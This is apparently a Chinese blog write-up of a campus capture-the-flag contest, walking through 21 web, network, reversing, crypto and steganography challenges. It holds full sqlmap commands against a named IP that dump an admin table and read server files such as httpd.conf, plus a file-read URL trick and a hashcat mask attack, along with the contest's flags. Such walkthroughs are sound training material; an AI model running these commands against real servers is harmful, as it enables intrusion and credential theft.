第三届尚然杯WP

开学初的校内比赛,虽然有点水,但奖品好歹是一个IPad mini。

1.文件权限配置错误

直接访问文件,http://115.28.247.210/contestweb/config.php。 get flag “{flag:c38264c590fbc4716401dc946c04803d}”

2.突破登陆

查看页面源码,看到被注释的SetCookie、getCookie、delCookie三个JS方法,chrome F12,Network看到页面cookies “admin=none; username=guest; userpwd=guest”。

复制三个JS方法进Console,执行。再执行SetCookie(“admin”,”true”),get flag “flag=8a93abf22ecfb5dbb9eb29e796183a8a”

3.解救单身

Url中Index.php的I大写了,猜测区分大小写,修改为index.php,获得新页面。查看源代码发现大量的[],疑似一种JS扰码手段(JSFuck)。F12 代码放入()中间,console执行,稍等片刻,获得一段base64,解码 get flag “Welcome_to_shangranbei”

4.API调用

页面源码看到setRequestHeader(“Content-Type”,”application/json”),尝试后可以通过application/xml请求,了解到xml API可能会存在XXE漏洞。通过POSTMAN伪造请求,

get flag “{FLAG:2fe51fe5b15507f52e551bafac103794}”

5.签到题

查看页面源码 get flag “flag{w54d3L9eLsoZznnJounWox0SkFY6di5d}”

6.网络1

大致查看数据包,发现有SNMP包,筛选条件设置为snmp,get flag “flag{077149a68b9d4f25f52bb11530f44028}”

7.网络2

发现有telnet包,设置筛选条件为telnet.data contains “FLAG:”,发现四个flag,尝试后只有第四个可以。get flag “{FLAG:c4559da2920175b7427954a1399c46da}”

8.网络3

发现大量的ISAMKP和ESP包,属于ipsec的数据包,解密需要密钥。发现有telnet包后查看telnet包,发现有条命令sudo ip xfrm state,执行后显示了类似于密钥的信息,查询资料了解到是ESP包的密钥,在Wireshark首选项中导入密钥。

设置筛选条件esp,发现数据包已解密。分析解密后的http请求,flag应该存在于flag.png中,但Wireshark提示malformed packet,查看包序列,应该还有其他包。使用跟踪流功能,获得完整数据并导出raw。使用Notepad++删除http请求头。获得完整图片。

9.破解软件登陆密码

通过IDA打开,直接获得明文密码。get flag.” UNDpQW==”

10.安卓逆向

通过d2j-dex2jar反编译classes.dex,获得jar文件,通过jd-gui分析源码,发现to_reach_int的生成算法有逻辑错误,可能出现0。开关几次程序出现0。get flag

11.简单密码

百度md5值,常见值get flag “admin123”

12.盐盐盐

解base64三次 get flag “shang_ran_bei”

13.天外来音

摩斯电码翻译get flag “FLAG522018D665387D1DA931812B77763410”

14.简单加密

Base64解密获得url,下载获得word文档,打开白底白字隐藏方法,直接复制,get flag “{flag: de949a6f9504e9d12b2f3a4de4c6d190}”

15.好多盐

hashcat64.exe -a 3 -m 10 password mask

get flag “{FLAG:1234567890}”

16.嗨、我的朋友

查看文件属性,版权信息内获取flag。get flag “flag{hi_my_fri3ndz}”

17.好像哪里不对

直接notepad++打开zip获取flag。get flag “flag{s419JDKv8tHLcTKIJVicHQntnWHojjkP}”

18.蒲公英

使用Stegsolve.jar调整图片通道,获得异常的二维码。使用PS反相,获得正常二维码,扫描后获得字符串。分析后为base32编码,使用C#语言编写解码器。get flag “flag_Xd{hSh_ctf:U2s0_coo1}”

19.图片分离

直接Notepad++打开,文件尾部获得get flag “flag{VqGkkebaro9AjuUpO2IEONLNml0FVCTc}”

20.管理员登陆

用户登录页面查看源码发现隐藏的搜索留言接口,简单手工测试发现是注入点。

用sqlmap拖库,用户名为admin,密码解密后为admin。

sqlmap -u http://115.28.247.210/contestweb/search.php?search=1 –dbs

sqlmap -u http://115.28.247.210/contestweb/search.php?search=1 --tables -D "AAA"

sqlmap -u http://115.28.247.210/contestweb/search.php?search=1 --columns -T "admin"

sqlmap -u http://115.28.247.210/contestweb/search.php?search=1 --dump -C "admin_id,admin_name,admin_pass" -T "admin"

url猜测 管理员登录页面   为contestweb/admin/login.php,输入用户名密码后 get flag “{flag:c38264c590fbc4716401dc946c04803d}”

21.送命题

这题两种办法,A办法是上一题的漏洞搅屎。

A. 利用管理员登录题目的注入点,查看浏览器请求信息,确认服务器为Apache。sqlmap执行命令 sqlmap -u http://115.28.247.210/contestweb/search.php?search=1 –file-read “/etc/httpd/conf/httpd.conf “,获取服务器文件/etc/httpd/conf/httpd.conf。根据配置文件分析出http目录是/var/www/html。sqlmap执行命令 sqlmap -u http://115.28.247.210/contestweb/search.php?search=1 –file-read “/var/www/html/test2.php”。获取文件,get flag “flag{pRPZtrLjKVNEm5w0BV9znZ69i1KssBzB}”

B. 打开页面后跳转页面http://115.28.247.210/test2.php?jpg=81.jpg,修改地址为http://115.28.247.210/test.php?jpg=81.jpg发现可以读取文件。再次修改地址为http://115.28.247.210/test.php?jpg=test2.php。获得test2.php内容base64编码,解码后获得文件内容。get flag “flag{pRPZtrLjKVNEm5w0BV9znZ69i1KssBzB}”

Copyright © 2016 – 2017, Mjollnir. 除非另有声明,本网站采用知识共享“署名-非商业性使用-相同方式共享 3.0 中国大陆”许可协议授权。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据